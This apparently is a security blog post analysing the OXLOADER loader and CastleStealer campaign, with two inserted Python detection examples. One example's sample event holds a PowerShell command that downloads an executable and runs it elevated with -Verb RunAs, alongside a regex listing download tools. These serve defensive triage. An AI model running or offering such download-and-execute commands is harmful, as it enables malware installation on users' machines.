
OXLOADER Malware

By Mezo in Malware

Cybersecurity researchers have uncovered a new malware campaign, designated REF8372, that employs a previously undocumented malware loader known as OXLOADER to deploy the information-stealing malware CastleStealer.

The operation begins with malicious Google advertisements designed to lure victims searching for popular software. Analysis suggests that the threat actors behind the campaign are likely Russian-speaking and financially motivated. This assessment is based on the malware's deliberate exclusion of systems located within the Commonwealth of Independent States (CIS), a tactic frequently used by cybercriminal groups operating in the region.

Although the campaign's advertisements were published under the verified name 'ВОЛОДИМИР ТЕРЕЩЕНКО,' allegedly based in Ukraine, it remains unclear whether this identity belongs to the operators themselves or represents a compromised, purchased, or fabricated account. Google removed the advertiser account and associated campaigns on May 14, 2026.

Search Engine Manipulation Leads Victims to Fake Software Sites

The infection chain is triggered when users search for terms such as 'lts version of node.js' through search engines like Google. Victims are redirected through sponsored results to a counterfeit website, node-js.prentiva99.info, masquerading as a legitimate software resource.

Users interacting with the fraudulent website are prompted to download a batch script hosted on Storj, a decentralized and open-source cloud storage platform. The abuse of legitimate services such as Storj highlights a growing trend among threat actors, who increasingly rely on trusted platforms to bypass domain reputation and security filtering mechanisms.

Multi-Stage Infection Chain Conceals Malicious Activity

Execution of the downloaded batch file displays a fake installation wizard, creating the illusion of a legitimate software setup while covertly downloading the next-stage payload, OXLOADER, from Storj. The malware is retrieved through a PowerShell command and launched with the -Verb RunAs parameter, generating a Windows User Account Control (UAC) prompt.

The attack subsequently uses DLL side-loading techniques to execute a malicious dynamic-link library, which decrypts and launches the final payload, CastleStealer.
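The two endpoint behaviours described above, a PowerShell command that downloads a payload and relaunches it with -Verb RunAs, and a DLL side-loaded from a directory under the user's control, are the kind of telemetry a detection engineer can match on. The following is an added example, not code from the article or from the researchers who reported REF8372: a small triage routine run over constructed Sysmon-style events. The hostnames, file names and paths in the sample events (including the link.storjshare.io URL and the version.dll name) are constructed for illustration and are not indicators from the campaign.

```python
"""Triage constructed endpoint telemetry for the two behaviours the article
describes: PowerShell fetching a payload and re-launching it elevated via
-Verb RunAs, and an unsigned DLL loaded from a user-writable directory beside
its host executable (side-loading).

Added example, not code from the article or from the researchers; the events,
hosts and paths below are constructed for illustration."""
import ntpath
import re

# Constructed Sysmon-style events: id 1 = process create, id 7 = image load.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ('powershell -w hidden -c "iwr https://link.storjshare.io/example/setup.exe '
                 '-OutFile $env:TEMP\\setup.exe; Start-Process $env:TEMP\\setup.exe -Verb RunAs"')},
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\backup.ps1"},
    {"id": 7, "image": r"C:\Users\victim\AppData\Local\Temp\setup\updater.exe",
     "loaded": r"C:\Users\victim\AppData\Local\Temp\setup\version.dll", "signed": False},
    {"id": 7, "image": r"C:\Program Files\Vendor\app.exe",
     "loaded": r"C:\Windows\System32\version.dll", "signed": True},
]

# Roots an unprivileged user can write to (heuristic, not exhaustive).
USER_WRITABLE = re.compile(r"^[a-z]:\\(users|programdata|windows\\temp)\\", re.I)
# Common PowerShell download primitives.
DOWNLOAD = re.compile(r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|"
                      r"start-bitstransfer|\bcurl\b|\bwget\b)", re.I)
ELEVATE = re.compile(r"-verb\s+runas", re.I)


def is_powershell_download_then_runas(ev):
    """Process-create event where PowerShell both downloads and relaunches elevated."""
    return (ev["id"] == 1
            and ev["image"].lower().endswith("powershell.exe")
            and bool(DOWNLOAD.search(ev["cmdline"]))
            and bool(ELEVATE.search(ev["cmdline"])))


def is_unsigned_sideload_from_user_dir(ev):
    """Image-load event where an unsigned DLL sits beside its host in a user-writable path."""
    if ev["id"] != 7 or ev.get("signed", False):
        return False
    same_dir = ntpath.dirname(ev["loaded"]).lower() == ntpath.dirname(ev["image"]).lower()
    return same_dir and bool(USER_WRITABLE.match(ev["loaded"]))


def triage(events):
    """Return (rule, event_index) pairs for every event a rule matches."""
    findings = []
    for i, ev in enumerate(events):
        if is_powershell_download_then_runas(ev):
            findings.append(("powershell_download_then_runas", i))
        if is_unsigned_sideload_from_user_dir(ev):
            findings.append(("unsigned_dll_sideload_user_dir", i))
    return findings


if __name__ == "__main__":
    for rule, idx in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"{rule}: event {idx} -> {ev.get('cmdline') or ev['loaded']}")
```

Both rules are deliberately narrow: the first requires a download primitive and the elevation verb in the same command line, which a routine administrative script rarely combines, and the second fires only when the DLL is unsigned, co-located with its host, and under a user-writable root, so vendor software that loads its own DLLs from Program Files is not flagged.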

Advanced Evasion Techniques Increase Detection Challenges

OXLOADER incorporates several sophisticated techniques specifically designed to hinder analysis and evade detection:

  • Multiple obfuscation layers, including control-flow flattening, opaque predicates, and Mixed Boolean-Arithmetic (MBA) expressions.
  • Self-modifying decryption routines, abuse of the PE file's .reloc section for shellcode staging, and anti-sandbox mechanisms that prevent execution in virtualized analysis environments.

These capabilities demonstrate a deliberate and well-engineered approach to avoiding both static and dynamic detection mechanisms.
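Of the techniques listed, staging shellcode in the .reloc section is the one most amenable to a cheap static check: a linker-produced relocation section is initialized, read-only, discardable data with low entropy, so a .reloc that is marked executable or writable, lacks the discardable flag, or is filled with high-entropy bytes deserves a closer look. The following is an added example, not code from the article or from the researchers: a minimal PE section-table parser with that heuristic, run against two PE images that are constructed inline (the entropy threshold of 7.0 bits per byte is an assumed rule of thumb, not a value from the page).

```python
"""Static triage of a PE file's .reloc section. A linker-produced relocation
section is initialized, read-only, discardable data with low entropy; a
.reloc that is executable, writable, or filled with high-entropy bytes is
worth a closer look when shellcode staging in that section is suspected.

Added example, not code from the article or the researchers; the two PE
images below are constructed in-line so the check runs offline."""
import math
import struct
from collections import Counter, namedtuple

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

Section = namedtuple("Section", "name vsize rawptr rawsize chars")


def shannon_entropy(data):
    """Bits of entropy per byte, 0.0 (constant) .. 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_headers(pe):
    """Parse the COFF section table; SizeOfOptionalHeader is honoured so real files work."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections, = struct.unpack_from("<H", pe, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size          # section headers follow the optional header
    out = []
    for i in range(nsections):
        name, vsize, _va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + 40 * i)
        out.append(Section(name.rstrip(b"\0").decode("ascii", "replace"), vsize, rawptr, rawsize, chars))
    return out


def assess_reloc(pe, entropy_threshold=7.0):
    """Return the list of heuristic flags raised by the .reloc section ([] if clean)."""
    flags = []
    for s in section_headers(pe):
        if s.name != ".reloc":
            continue
        if s.chars & IMAGE_SCN_MEM_EXECUTE:
            flags.append("reloc_executable")
        if s.chars & IMAGE_SCN_MEM_WRITE:
            flags.append("reloc_writable")
        if not s.chars & IMAGE_SCN_MEM_DISCARDABLE:
            flags.append("reloc_not_discardable")
        data = pe[s.rawptr:s.rawptr + min(s.vsize, s.rawsize)]
        if shannon_entropy(data) > entropy_threshold:
            flags.append("reloc_high_entropy")
    return flags


def build_pe(sections):
    """Assemble a minimal PE (no optional header) from (name, characteristics, data) triples."""
    align = lambda v, a: (v + a - 1) & ~(a - 1)
    raw_ptr = first_raw = align(64 + 4 + 20 + 40 * len(sections), 0x200)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)     # e_lfanew: PE signature right after DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 0, 0x22)
    headers, body, va = b"", b"", 0x1000
    for name, chars, data in sections:
        raw_size = align(len(data), 0x200)
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data), va,
                               raw_size, raw_ptr, 0, 0, 0, 0, chars)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += align(raw_size, 0x1000)
    return (bytes(dos) + b"PE\0\0" + coff + headers).ljust(first_raw, b"\0") + body


# Constructed samples: a linker-style relocation block versus a .reloc carrying uniform bytes.
RELOC_DATA = struct.pack("<II", 0x1000, 8 + 4 * 2) + struct.pack("<HHHH", 0xA010, 0xA020, 0xA038, 0)
BENIGN_PE = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, b"\xC3" * 16),
    (".reloc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ, RELOC_DATA),
])
SUSPICIOUS_PE = build_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, b"\xC3" * 16),
    (".reloc", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, bytes(range(256)) * 16),
])

if __name__ == "__main__":
    print("benign    :", assess_reloc(BENIGN_PE) or "no flags")
    print("suspicious:", assess_reloc(SUSPICIOUS_PE))
```

The parser reads only the DOS stub, COFF header and section table, which is enough for this check and works unchanged on real executables; packed or encrypted sections elsewhere in a binary will also show high entropy, so the flags are triage hints to combine with the section's permission bits rather than a verdict on their own.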

CastleStealer’s Growing Presence in Cybercrime Operations

CastleStealer is a .NET-based information-stealing malware family that has recently appeared in additional campaigns. It was previously distributed alongside CastleLoader through a ClickFix-style social engineering lure that posed as a free image-editing application in an operation known as BackgroundFix. CastleLoader has been linked to the threat activity cluster tracked as GrayBravo.

Early-Stage Threat with Significant Potential

Although OXLOADER appears to be in the early stages of operational deployment, its technical sophistication warrants close attention from defenders. Several characteristics indicate substantial investment by its developers:

  • Extensive code obfuscation and anti-virtual-machine protections.
  • Use of benign-looking code to disguise malicious binaries and unique payload staging techniques.

These design choices have already proven effective, enabling OXLOADER to achieve low detection rates across static scanning engines and automated detonation environments. As a result, the malware currently benefits from a valuable operational window before widespread detection signatures and countermeasures are developed.
